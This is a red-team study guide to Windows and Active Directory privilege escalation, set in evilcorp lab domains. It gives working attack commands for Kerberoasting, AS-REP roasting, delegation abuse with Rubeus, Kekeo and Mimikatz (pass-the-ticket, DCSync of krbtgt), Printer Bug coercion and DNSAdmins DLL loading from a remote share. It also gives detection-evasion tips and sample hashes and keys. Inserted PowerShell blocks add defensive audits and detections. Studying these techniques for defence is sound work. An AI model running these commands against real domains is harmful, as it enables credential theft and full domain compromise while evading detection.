Privilege Escalation

Local Privilege Escalation

  • Missing patches

  • Automated deployment and AutoLogon passwords in clear text

  • AlwaysInstallElevated (Any user can run MSI as SYSTEM)

  • Misconfigured Services

  • DLL Hijacking and more

  • NTLM Relaying a.k.a. Won't Fix

Tools for complete coverage

  • PowerUp: https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

  • Privesc: https://github.com/enjoiz/Privesc

  • winPEAS: https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

Service Issues using PowerUp.ps1

PowerUp.ps1 Invoke-AllChecks

Import-Module .\PowerUp.ps1
Invoke-AllChecks

Get services with unquoted paths and a space in their name

Get-ServiceUnquoted -Verbose

Get services where the current user can write to its binary path or change arguments to the binary

Get-ModifiableServiceFile -Verbose

Get the services whose configuration current user can modify

Get-ModifiableService -Verbose
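The same two service findings, expressed as a hardening audit rather than a PowerUp run, as an added example that is not part of these notes or of PowerUp. It flags unquoted paths that actually need quoting, service binaries whose ACL lets low-privilege groups write, and the AlwaysInstallElevated policy pair from the list at the top. The function names and the sample PathName strings are constructed for illustration.

```powershell
# Added example, not from the original notes or from PowerUp.
# Mirrors Get-ServiceUnquoted / Get-ModifiableServiceFile as a hardening audit.

function Test-UnquotedServicePath {
    param([string]$PathName)
    # PathName is the raw Win32_Service.PathName value. It only needs quoting
    # when it is unquoted and the executable part (up to ".exe") has a space.
    if ([string]::IsNullOrWhiteSpace($PathName) -or $PathName.StartsWith('"')) { return $false }
    $exe = ($PathName -split '\.exe', 2)[0]
    return $exe.Contains(' ')
}

function Test-WritableServiceBinary {
    param([string]$PathName)
    # Pull the executable out of a quoted or unquoted PathName and look for
    # Allow ACEs that give broad groups Write/Modify/FullControl on it.
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $exe = if ($PathName -match '^"([^"]+)"')     { $Matches[1] }
           elseif ($PathName -match '^(.*?\.exe)') { $Matches[1] }
           else                                    { ($PathName -split ' ')[0] }
    if (-not (Test-Path -LiteralPath $exe)) { return $null }   # binary not found
    $lowPriv   = 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone'
    $writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'
    foreach ($ace in (Get-Acl -LiteralPath $exe).Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $lowPriv -contains $ace.IdentityReference.Value -and
            (($ace.FileSystemRights -band $writeMask) -ne 0)) { return $true }
    }
    return $false
}

function Test-AlwaysInstallElevated {
    # The MSI-as-SYSTEM condition only holds when the value is 1 in BOTH hives.
    $hits = foreach ($hive in 'HKLM:', 'HKCU:') {
        $key = "$hive\SOFTWARE\Policies\Microsoft\Windows\Installer"
        $v = Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        if ($v -and $v.AlwaysInstallElevated -eq 1) { $hive }
    }
    return (@($hits).Count -eq 2)
}

function Get-ServiceHardeningReport {
    # Live run over the local machine's services; an elevated shell is needed
    # to read every ACL. Only services with a finding are returned.
    Get-CimInstance Win32_Service | ForEach-Object {
        [pscustomobject]@{
            Name           = $_.Name
            RunsAs         = $_.StartName
            PathName       = $_.PathName
            UnquotedPath   = Test-UnquotedServicePath -PathName $_.PathName
            WritableBinary = Test-WritableServiceBinary -PathName $_.PathName
        }
    } | Where-Object { $_.UnquotedPath -or $_.WritableBinary }
}

# Constructed sample PathName values (not real services) so the quoting check
# can be exercised offline: only the first one should be flagged.
$samples = @(
    'C:\Program Files\Vendor App\svc.exe -run',
    '"C:\Program Files\Vendor App\svc.exe" -run',
    'C:\Windows\System32\svchost.exe -k netsvcs'
)
foreach ($p in $samples) { '{0,-5} {1}' -f (Test-UnquotedServicePath $p), $p }
"AlwaysInstallElevated on this host: $(Test-AlwaysInstallElevated)"
```

An unquoted path is fixed from cmd.exe with `sc.exe config <service> binPath= "\"C:\Program Files\Vendor App\svc.exe\" -run"`; a writable binary is fixed by resetting its ACL so only Administrators and SYSTEM can modify it.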

privesc.ps1

Import-Module .\privesc.ps1
Invoke-PrivEsc

winPEAS-ng

.\winPEASx64.exe

Feature Abuse

  • Feature abuse is awesome as there are seldom patches for it and it is not the focus of security teams!

  • One of my favorite feature abuses is targeting enterprise applications which are not built keeping security in mind

  • On Windows, many enterprise applications need either Administrative privileges or SYSTEM privileges, making them a great avenue for privilege escalation

Kerberoast

  • Offline cracking of service account passwords.

  • The Kerberos session ticket (TGS) has a server portion which is encrypted with the password hash of the service account. This makes it possible to request a ticket and do an offline password attack

  • Because (non-machine) service account passwords are not frequently changed, this has become a very popular attack!

  • Request tickets one at a time to avoid chance of detection

Find user accounts used as Service accounts

PV: Get-DomainUser -SPN
ADM: Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Use Rubeus to list Kerberoast stats

Rubeus.exe kerberoast /stats

Use Rubeus to request a TGS

  • Request tickets one at a time to avoid chance of detection

Rubeus.exe kerberoast /user:svcadmin /simple

To avoid detections based on Encryption Downgrade for Kerberos EType (used by the likes of MDI; 0x17 stands for rc4-hmac), look for Kerberoastable accounts that only support RC4_HMAC

Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec

Kerberoast all possible accounts

Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt

Crack ticket using John the Ripper

john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt
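What the encryption-downgrade detection mentioned above actually keys on, as an added example that is not part of these notes or of Rubeus: 4769 (TGS request) events on a domain controller where one account requests RC4 (0x17) service tickets for many different SPNs from one source in a short window. The `/rc4opsec` switch only helps against the etype part of that signature; the burst of distinct services remains. The function names and the sample events are constructed.

```powershell
# Added example, not from the original notes or from Rubeus.
# Kerberoast detection over 4769 events (logged only on domain controllers).

function Get-TgsRequestEvents {
    param([string]$DomainController = $env:COMPUTERNAME, [int]$Hours = 24)
    # Flatten EventData of each 4769 into a plain object.
    $filter = @{ LogName = 'Security'; Id = 4769; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -ComputerName $DomainController -FilterHashtable $filter | ForEach-Object {
        $x = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            TimeCreated          = $_.TimeCreated
            TargetUserName       = $d.TargetUserName        # requesting account
            ServiceName          = $d.ServiceName           # account owning the SPN
            TicketEncryptionType = $d.TicketEncryptionType  # 0x17 = RC4-HMAC
            IpAddress            = $d.IpAddress
        }
    }
}

function Find-KerberoastActivity {
    param(
        [Parameter(Mandatory)][object[]]$Events,
        [int]$MinDistinctServices = 5,
        [int]$WindowMinutes = 10
    )
    # Machine accounts (names ending in $) have long random passwords and are
    # skipped, as is the krbtgt service itself.
    $rc4 = $Events | Where-Object {
        $_.TicketEncryptionType -eq '0x17' -and
        $_.ServiceName -notmatch '\$$' -and
        $_.ServiceName -notlike 'krbtgt*'
    }
    foreach ($g in ($rc4 | Group-Object TargetUserName, IpAddress)) {
        $sorted   = @($g.Group | Sort-Object TimeCreated)
        $services = @($sorted.ServiceName | Sort-Object -Unique)
        $span     = ($sorted[-1].TimeCreated - $sorted[0].TimeCreated).TotalMinutes
        if ($services.Count -ge $MinDistinctServices -and $span -le $WindowMinutes) {
            [pscustomobject]@{
                Requester = $sorted[0].TargetUserName
                Source    = $sorted[0].IpAddress
                Services  = $services.Count
                Minutes   = [math]::Round($span, 1)
                Targets   = $services -join ','
            }
        }
    }
}

# Constructed sample events (no real log data): one account pulling RC4
# tickets for six service accounts inside a minute, plus one normal AES request.
$t0 = Get-Date '2024-01-15 09:00:00'
$sample = @(
    foreach ($i in 1..6) {
        [pscustomobject]@{ TimeCreated = $t0.AddSeconds(10 * $i); TargetUserName = 'bob@corp.local'
                           ServiceName = "svc$i"; TicketEncryptionType = '0x17'; IpAddress = '10.0.0.5' }
    }
    [pscustomobject]@{ TimeCreated = $t0; TargetUserName = 'alice@corp.local'
                       ServiceName = 'FILESRV01$'; TicketEncryptionType = '0x12'; IpAddress = '10.0.0.9' }
)
Find-KerberoastActivity -Events $sample | Format-Table -AutoSize
# Live use on a DC: Find-KerberoastActivity -Events (Get-TgsRequestEvents -Hours 1)
```

Only bob from 10.0.0.5 is reported. On the configuration side, the accounts this finds tickets for should be moved to group Managed Service Accounts or 25+ character passwords and restricted to AES via msDS-SupportedEncryptionTypes, which also removes the RC4-only accounts that `/rc4opsec` looks for.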

Targeted Kerberoasting - AS-REP

  • If a user's UserAccountControl settings have "Do not require Kerberos preauthentication" enabled, i.e. Kerberos preauth is disabled, it is possible to grab the user's crackable AS-REP and brute-force it offline

  • With sufficient rights (GenericWrite or GenericAll), Kerberos preauth can be forced disabled as well

Enumerating accounts with Kerberos Preauth disabled

PV: Get-DomainUser -PreauthNotRequired -Verbose
ADM: Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Force disable Kerberos Preauth:

Enumerate the permissions for RDPUsers on ACLs

PV: Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
PV: Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} -Verbose
PV: Get-DomainUser -PreauthNotRequired -Verbose

Request encrypted AS-REP for offline brute-force

Get-ASREPHash -UserName VPNUser -Verbose

To enumerate all users with Kerberos preauth disabled and request a hash

Invoke-ASREPRoast -Verbose

Crack hashes offline with John The Ripper

john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\asrephashes.txt
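The XOR value 4194304 used above is the DONT_REQUIRE_PREAUTH bit (0x400000) of userAccountControl. The following PowerShell, an added example that is not part of these notes, decodes that attribute into the flags this page cares about (the delegation flags used in the sections below are included), reproduces the pre-auth enumeration as an LDAP bitwise filter, and re-enables pre-authentication. The function names are constructed; the sample values are not from a real domain.

```powershell
# Added example, not from the original notes. Decodes userAccountControl and
# wraps the audit/remediation for accounts with Kerberos pre-auth disabled.

$UacFlags = [ordered]@{
    PASSWD_NOTREQD                 = 0x0020
    DONT_EXPIRE_PASSWORD           = 0x10000
    TRUSTED_FOR_DELEGATION         = 0x80000     # unconstrained delegation
    NOT_DELEGATED                  = 0x100000    # "sensitive, cannot be delegated"
    DONT_REQUIRE_PREAUTH           = 0x400000    # = 4194304, AS-REP roastable
    TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # T2A4D, protocol transition
}

function ConvertFrom-UserAccountControl {
    param([Parameter(Mandatory)][int]$Value)
    # Names of the set flags from the table above.
    @($UacFlags.GetEnumerator() | Where-Object { ($Value -band $_.Value) -ne 0 } | ForEach-Object Key)
}

function Test-PreauthDisabled {
    param([Parameter(Mandatory)][int]$UserAccountControl)
    return (($UserAccountControl -band $UacFlags.DONT_REQUIRE_PREAUTH) -ne 0)
}

function Get-PreauthDisabledAccounts {
    # Same result as the -PreauthNotRequired / DoesNotRequirePreAuth filters above,
    # written as an LDAP bitwise-AND match (1.2.840.113556.1.4.803) on userAccountControl.
    Import-Module ActiveDirectory
    Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=4194304)' -Properties userAccountControl |
        Select-Object SamAccountName,
            @{ n = 'Flags'; e = { (ConvertFrom-UserAccountControl $_.userAccountControl) -join ',' } }
}

function Repair-PreauthDisabledAccount {
    param([Parameter(Mandatory)][string]$SamAccountName)
    # Turn pre-authentication back on; keep the flag only where a documented legacy client needs it.
    Set-ADAccountControl -Identity $SamAccountName -DoesNotRequirePreAuth $false
}

# Constructed sample values: 512 is a plain enabled user, 4194816 = 512 + 4194304
# is the same account after the XOR in the notes above.
foreach ($v in 512, 4194816, (512 + 0x80000), (512 + 0x1000000)) {
    '{0,-10} preauthDisabled={1,-5} flags={2}' -f $v, (Test-PreauthDisabled $v),
        ((ConvertFrom-UserAccountControl $v) -join ',')
}
```

On the detection side the matching signal is a 4768 (TGT request) event with Pre-Authentication Type 0 and an RC4 (0x17) ticket for an account that is not expected to be exempt; the ACL change that forces the flag shows up as a userAccountControl modification on the user object when directory service change auditing is on.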

Set SPN

  • With enough rights (GenericAll/GenericWrite), a target user's SPN can be set to anything (unique in the domain)

  • We can then request a TGS without special privileges. The TGS can then be "Kerberoasted"

Enumerate the permissions for RDPUsers on ACLs using PowerView:

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Check if the user already has a SPN:

PV: Get-DomainUser -Identity supportuser | select serviceprincipalname
ADM: Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName

Set a SPN for the user (must be unique for the domain)

PV: Set-DomainObject -Identity support1user -Set @{serviceprincipalname='ecorp/whatever1'}
ADM: Set-ADUser -Identity support1user -ServicePrincipalNames @{Add='ecorp/whatever1'}

Kerberoast the user

Rubeus.exe kerberoast /outfile:targetedhashes.txt
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt
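The Set-DomainObject / Set-ADUser lines above leave a directory change event (5136) behind when "Audit Directory Service Changes" is enabled and the user objects carry a SACL for "Write all properties". The PowerShell below, an added example that is not part of these notes, parses such events and flags an SPN being added to a user object by anyone outside the accounts that legitimately manage service accounts. The function names, the allow-list and the sample event XML are constructed.

```powershell
# Added example, not from the original notes. Flags servicePrincipalName
# values added to user objects from 5136 (directory service object modified).

function ConvertFrom-DsChangeEvent {
    param([Parameter(Mandatory)][xml]$EventXml)
    $d = @{}
    foreach ($n in $EventXml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    [pscustomobject]@{
        Actor       = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
        ObjectDN    = $d.ObjectDN
        ObjectClass = $d.ObjectClass
        Attribute   = $d.AttributeLDAPDisplayName
        Value       = $d.AttributeValue
        # %%14674 = value added, %%14675 = value deleted
        Operation   = $(switch ($d.OperationType) { '%%14674' { 'Added' } '%%14675' { 'Deleted' } default { $d.OperationType } })
    }
}

function Test-SuspiciousSpnChange {
    param([Parameter(Mandatory)]$Change, [string[]]$AllowedActors = @())
    # An SPN added to a *user* (not a computer) by an account that is not a
    # known service-account owner is what the targeted Kerberoast above looks like.
    return ($Change.Operation -eq 'Added' -and
            $Change.Attribute -eq 'servicePrincipalName' -and
            $Change.ObjectClass -eq 'user' -and
            $AllowedActors -notcontains $Change.Actor)
}

function Get-SpnChangeAlerts {
    param([string]$DomainController = $env:COMPUTERNAME, [int]$Hours = 24, [string[]]$AllowedActors = @())
    $filter = @{ LogName = 'Security'; Id = 5136; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -ComputerName $DomainController -FilterHashtable $filter |
        ForEach-Object { ConvertFrom-DsChangeEvent ([xml]$_.ToXml()) } |
        Where-Object { Test-SuspiciousSpnChange -Change $_ -AllowedActors $AllowedActors }
}

# Constructed 5136 payload (placeholder names, not from a real domain).
$sample = [xml]@'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>5136</EventID></System>
  <EventData>
    <Data Name="SubjectUserName">rdpuser1</Data>
    <Data Name="SubjectDomainName">CORP</Data>
    <Data Name="ObjectDN">CN=supportuser,OU=Staff,DC=corp,DC=local</Data>
    <Data Name="ObjectClass">user</Data>
    <Data Name="AttributeLDAPDisplayName">servicePrincipalName</Data>
    <Data Name="AttributeValue">ecorp/whatever1</Data>
    <Data Name="OperationType">%%14674</Data>
  </EventData>
</Event>
'@
$change = ConvertFrom-DsChangeEvent $sample
$change
"Alert: $(Test-SuspiciousSpnChange -Change $change -AllowedActors 'CORP\svc-provisioning')"
```

The sample produces an alert because CORP\rdpuser1 is not on the allow-list. The underlying fix is the ACL: GenericWrite/GenericAll on user objects for groups such as RDPUsers is the finding that Find-InterestingDomainAcl reports above, and removing it closes both this and the pre-auth variant.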

Kerberos Delegation

  • Kerberos Delegation allows a service to "reuse the end-user credentials to access resources hosted on a different server"

  • This is typically useful in multi-tier services or applications where the Kerberos Double Hop is required

  • For example, a user authenticates to a web server and the web server makes requests to a database server. The web server can request access to resources (all or some resources depending on the type of delegation) on the database server as the user and not as the web server's service account

  • Please note that, for the above example, the service account for the web service must be trusted for delegation to be able to make requests as a user

  1. A user provides credentials to the Domain Controller.

  2. The DC returns a TGT.

  3. The user requests a TGS for the web service on the Web Server.

  4. The DC provides a TGS.

  5. The user sends the TGT and TGS to the web server.

  6. The web server service account uses the user's TGT to request a TGS for the database server from the DC.

  7. The web server service account connects to the database server as the user.

  • There are two types of Kerberos Delegation:

    • General/Basic or Unconstrained Delegation which allows the first hop server (web server in our example) to request access to any service on any computer in the domain

    • Constrained Delegation which allows the first hop server to request access only to specified services on specified computers. If the user is not using Kerberos authentication to authenticate to the first hop server, Windows offers Protocol Transition to transition the request to Kerberos

  • Please note that in both types of delegations, a mechanism is required to impersonate the incoming user and authenticate to the second hop server as the user

Unconstrained Delegation

  • When set for a particular service account, unconstrained delegation allows delegation to any service on any resource in the domain as the user

  • When unconstrained delegation is enabled, the DC places the user's TGT inside the TGS (Step 4 in the previous diagram). When presented to the server with unconstrained delegation, the TGT is extracted from the TGS and stored in LSASS. This way the server can reuse the user's TGT to access any other resource as the user

  • This could be used to escalate privileges in case we can compromise the computer with unconstrained delegation and a Domain Admin connects to that machine

Discover domain computers which have unconstrained delegation enabled

PV: Get-DomainComputer -UnConstrained
ADM: Get-ADComputer -Filter {TrustedForDelegation -eq $True}
ADM: Get-ADUser -Filter {TrustedForDelegation -eq $True}

Compromise the server(s) where Unconstrained delegation is enabled

  • We must trick or wait for a domain admin to connect to a service on appsrv

  • Now, if the command is run again:

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

  • The DA token could be reused:

Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\appadmin\Documents\user1\[0;2ceb8b3][email protected]"'

Printer Bug

  • How do we trick a high privilege user to connect to a machine with Unconstrained Delegation? The Printer Bug!

  • A feature of MS-RPRN which allows any domain user (Authenticated User) to force any machine (running the Spooler service) to connect to a second machine of the domain user's choice

  • We can force the evil-dc to connect to evil-srv by abusing the Printer bug

We can capture the TGT of evil-dc$ by using Rubeus on evil-srv:

Rubeus.exe monitor /interval:5 /nowrap

  • And after that run MS-RPRN.exe (https://github.com/leechristensen/SpoolSample) on the student VM:

MS-RPRN.exe \\evil-dc.livecorp.evilcorp.local \\evil-srv.livecorp.evilcorp.local

Copy the base64 encoded TGT, remove extra spaces (if any):

Rubeus.exe ptt /ticket:

  • Once the ticket is injected, run DCSync:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:ecorp\krbtgt"'

If you are attacking from a Linux machine, check out Coercer (https://github.com/p0dalirius/Coercer) for other MS protocols that can be abused for coercion
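The coercion above only works when the Print Spooler is listening on the domain controller. As an added example that is not part of these notes, SpoolSample or Coercer, the PowerShell below reports the Spooler state on every DC and disables it where nothing is printed from the DC. It assumes the RSAT ActiveDirectory module, WinRM to the DCs and Windows PowerShell 5.1 (Get-Service -ComputerName is not available in PowerShell 7); the function names are constructed.

```powershell
# Added example, not from the original notes or from SpoolSample/Coercer.
Import-Module ActiveDirectory

function Get-SpoolerExposure {
    param([string[]]$ComputerName = @((Get-ADDomainController -Filter *).HostName))
    foreach ($c in $ComputerName) {
        $svc = Get-Service -ComputerName $c -Name Spooler -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Computer  = $c
            Status    = $(if ($svc) { "$($svc.Status)/$($svc.StartType)" } else { 'unreachable or absent' })
            # MS-RPRN is reachable only while the service is running.
            Coercible = [bool]($svc -and $svc.Status -eq 'Running')
        }
    }
}

function Disable-Spooler {
    param([Parameter(Mandatory)][string]$ComputerName)
    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        Stop-Service -Name Spooler -Force
        Set-Service -Name Spooler -StartupType Disabled
    }
}

Get-SpoolerExposure | Format-Table -AutoSize
# Get-SpoolerExposure | Where-Object Coercible | ForEach-Object { Disable-Spooler -ComputerName $_.Computer }
```

Turning the Spooler off closes MS-RPRN only; the other coercion protocols the Coercer link covers remain, so the host with unconstrained delegation is the finding to remove, not just the trigger.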

Constrained Delegation

  • Constrained Delegation when enabled on a service account, allows access only to specified services on specified computers as a user.

  • A typical scenario where constrained delegation is used - A user authenticates to a web service without using Kerberos and the web service makes requests to a database server to fetch results based on the user's authorization.

  • To impersonate the user, Service for User (S4U) extension is used which provides two extensions:

    • Service for User to Self (S4U2self) - Allows a service to obtain a forwardable TGS to itself on behalf of a user with just the user principal name without supplying a password. The service account must have the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION - T2A4D UserAccountControl attribute.

    • Service for User to Proxy (S4U2proxy) - Allows a service to obtain a TGS to a second service on behalf of a user. Which second service? This is controlled by msDS-AllowedToDelegateTo attribute. This attribute contains a list of SPNs to which the user tokens can be forwarded.

with Protocol Transition

  • A user - Joe, authenticates to the web service (running with service account websvc) using a non-Kerberos compatible authentication mechanism.

  • The web service requests a ticket from the Key Distribution Center (KDC) for Joe's account without supplying a password, as the websvc account.

  • The KDC checks the websvc userAccountControl value for the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION attribute, and that Joe's account is not blocked for delegation. If OK it returns a forwardable ticket for Joe's account (S4U2Self).

  • The service then passes this ticket back to the KDC and requests a service ticket for the CIFS/dcorp-mssql.dollarcorp.moneycorp.local service.

  • The KDC checks the msDS-AllowedToDelegateTo field on the websvc account. If the service is listed it will return a service ticket for dcorp-mssql (S4U2Proxy).

  • The web service can now authenticate to the CIFS on evil-mssql as Joe using the supplied TGS.

To abuse constrained delegation in above scenario, we need to have access to the websvc account. If we have access to that account, it is possible to access the services listed in msDS-AllowedToDelegateTo of the websvc account as ANY user

Enumerate users and computers with constrained delegation enabled

PV: Get-DomainUser -TrustedToAuth
PV: Get-DomainComputer -TrustedToAuth
ADM: Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Abusing with Kekeo

  • Either a plaintext password or the NTLM hash/AES keys are required. We already have access to websvc's hash from evil-srv

Using asktgt from Kekeo, we request a TGT

kekeo# tgt::ask /user:websvc /domain:livecorp.evilcorp.local /rc4:cc098f204c5887eaa8253e7c2749156f

Using s4u from Kekeo, we request a TGS

kekeo# tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/evil-mssql.livecorp.evilcorp.LOCAL

Using mimikatz, inject the ticket:

Invoke-Mimikatz -Command '"kerberos::ptt [email protected]@LIVECORP.EVILCORP.LOCAL_cifs~evil-mssql.livecorp.evilcorp.LOCAL@LIVECORP.EVILCORP.LOCAL.kirbi"'

ls \\evil-mssql.livecorp.evilcorp.local\c$

Abusing with Rubeus

We can use the following command (We are requesting a TGT and TGS in a single command):

Rubeus.exe s4u /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:CIFS/evil-mssql.livecorp.evilcorp.LOCAL /ptt

ls \\evil-mssql.livecorp.evilcorp.local\c$

  • Another interesting issue in Kerberos is that the delegation occurs not only for the specified service but for any service running under the same account. There is no validation for the SPN specified.

  • This is huge as it allows access to many interesting services when the delegation may be for a non-intrusive service!

Abusing with Kekeo

  • Either a plaintext password or the NTLM hash is required. If we have access to the evil-srv$ hash:

Using asktgt from Kekeo, we request a TGT:

kekeo# tgt::ask /user:evil-srv$ /domain:livecorp.evilcorp.local /rc4:1fadb1b13edbc5a61cbdc389e6f34c67

Using s4u from Kekeo_one (no SNAME validation):

kekeo# tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:time/evil-dc.livecorp.evilcorp.LOCAL|ldap/evil-dc.livecorp.evilcorp.LOCAL

Using mimikatz:

Invoke-Mimikatz -Command '"kerberos::ptt [email protected]@LIVECORP.EVILCORP.LOCAL_ldap~evil-dc.livecorp.evilcorp.LOCAL@LIVECORP.EVILCORP.LOCAL_ALT.kirbi"'

Invoke-Mimikatz -Command '"lsadump::dcsync /user:livecorp\krbtgt"'

Abusing with Rubeus

We can use the following command (We are requesting a TGT and TGS in a single command):

Rubeus.exe s4u /user:evil-srv$ /aes256:db7bd8e34fada016eb0e292816040a1bf4eeb25cd3843e041d0278d30dc1b445 /impersonateuser:Administrator /msdsspn:time/evil-dc.live.evilcorp.LOCAL /altservice:ldap /ptt

  • After injection we can run DCSync

C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Resource-based Constrained Delegation

  • This moves delegation authority to the resource/service administrator.

  • Instead of SPNs in msDS-AllowedToDelegateTo on the front-end service like the web service, access in this case is controlled by the security descriptor of msDS-AllowedToActOnBehalfOfOtherIdentity (visible as PrincipalsAllowedToDelegateToAccount) on the resource/service like the SQL Server service.

  • That is, the resource/service administrator can configure this delegation whereas for other types, SeEnableDelegation privileges are required which are, by default, available only to Domain Admins.

  • To abuse RBCD in the most effective form, we just need two privileges.

    1. Write permissions over the target service or object to configure msDS-AllowedToActOnBehalfOfOtherIdentity.

    2. Control over an object which has SPN configured (like admin access to a domain joined machine or ability to join a machine to domain - ms-DS-MachineAccountQuota is 10 for all domain users)

  • We already have admin privileges on student VMs that are domain joined machines.

  • Enumeration would show that the user 'ciadmin' has Write permissions over the evil-ws machine!

Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}

Using the ActiveDirectory module, configure RBCD on evil-ws for user machines:

$comps = 'user1$','user2$'
Set-ADComputer -Identity evil-ws -PrincipalsAllowedToDelegateToAccount $comps

Now, let's get the privileges of evil-ws$ by extracting its AES keys:

Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

Use the AES key of evil-ws$ with Rubeus and access evil-ws as ANY user we want:

Rubeus.exe s4u /user:evil-ws$ /aes256:d1027fbaf7faad598aaeff08989387592c0d8e0201ba453d83b9e6b7fc7897c2 /msdsspn:http/evil-ws /impersonateuser:administrator /ptt

winrs -r:evil-dc cmd.exe
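One audit covering the three delegation types above (unconstrained, constrained with and without protocol transition, and RBCD), the ms-DS-MachineAccountQuota precondition, and the two settings that stop a privileged account from being delegated at all. This is an added example, not part of these notes; it assumes the RSAT ActiveDirectory module on a domain-joined host, and the function names and the placeholder account name are constructed.

```powershell
# Added example, not from the original notes. Delegation audit with the AD module.
Import-Module ActiveDirectory

function Get-DelegationReport {
    $dcs = @((Get-ADDomainController -Filter *).Name)

    # 1. Unconstrained: TRUSTED_FOR_DELEGATION. Normal on DCs, a finding anywhere else.
    Get-ADComputer -Filter 'TrustedForDelegation -eq $true' |
        Where-Object { $dcs -notcontains $_.Name } |
        ForEach-Object { [pscustomobject]@{ Kind = 'Unconstrained'; Principal = $_.SamAccountName; Target = '*' } }
    Get-ADUser -Filter 'TrustedForDelegation -eq $true' |
        ForEach-Object { [pscustomobject]@{ Kind = 'Unconstrained'; Principal = $_.SamAccountName; Target = '*' } }

    # 2. Constrained: msDS-AllowedToDelegateTo populated; T2A4D (0x1000000) adds
    #    protocol transition, i.e. S4U2self for users who never used Kerberos.
    Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' -Properties msDS-AllowedToDelegateTo, userAccountControl, sAMAccountName |
        ForEach-Object {
            $pt = ($_.userAccountControl -band 0x1000000) -ne 0
            [pscustomobject]@{
                Kind      = $(if ($pt) { 'Constrained+ProtocolTransition' } else { 'Constrained' })
                Principal = $_.sAMAccountName
                Target    = ($_.'msDS-AllowedToDelegateTo' -join ';')
            }
        }

    # 3. RBCD: configured on the *resource*; lists who may act on behalf of others to it.
    Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' -Properties PrincipalsAllowedToDelegateToAccount |
        ForEach-Object {
            [pscustomobject]@{ Kind = 'RBCD'; Principal = ($_.PrincipalsAllowedToDelegateToAccount -join ';'); Target = $_.SamAccountName }
        }
}

function Get-MachineAccountQuota {
    # 10 by default: any domain user may add ten computer objects, which supplies the
    # "control over an object with an SPN" half of the RBCD abuse. 0 closes it.
    $dn = (Get-ADDomain).DistinguishedName
    (Get-ADObject -Identity $dn -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
}

function Protect-PrivilegedAccount {
    param([Parameter(Mandatory)][string]$SamAccountName)
    # NOT_DELEGATED ("Account is sensitive and cannot be delegated") makes the KDC refuse
    # forwardable and S4U tickets for this user; Protected Users adds the same block plus
    # no RC4 and no NTLM. Apply to Domain Admins and other tier-0 accounts.
    Set-ADAccountControl -Identity $SamAccountName -AccountNotDelegated $true
    Add-ADGroupMember -Identity 'Protected Users' -Members $SamAccountName
}

Get-DelegationReport | Sort-Object Kind | Format-Table -AutoSize
"ms-DS-MachineAccountQuota = $(Get-MachineAccountQuota)"
# Protect-PrivilegedAccount -SamAccountName 'da-admin'   # placeholder account name
```

An unexpected RBCD entry such as the one configured on evil-ws above is removed with `Set-ADComputer -Identity evil-ws -PrincipalsAllowedToDelegateToAccount $null`; the write permission that allowed it (ciadmin over evil-ws in the enumeration above) is the finding to fix.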

DNS Admins

  • It is possible for members of the DNSAdmins group to load an arbitrary DLL with the privileges of dns.exe (SYSTEM)

  • In case the DC also serves as DNS, this will provide escalation to DA

  • Requires privileges to restart the DNS service

Enumerate members of DNSAdmins group

PV: Get-NetGroupMember -GroupName "DNSAdmins"
ADM: Get-ADGroupMember -Identity DNSAdmins

Using DNSAdmins user, configure DLL using dnscmd.exe (needs RSAT DNS):

dnscmd evil-dc /config /serverlevelplugindll \\172.16.100.12\mimilib.dll

OR using DNSServer module (needs RSAT DNS):

$dnsettings = Get-DnsServerSetting -ComputerName dcorp-dc -Verbose -All

$dnsettings.ServerLevelPluginDll = "\\172.16.100.12\mimilib.dll"

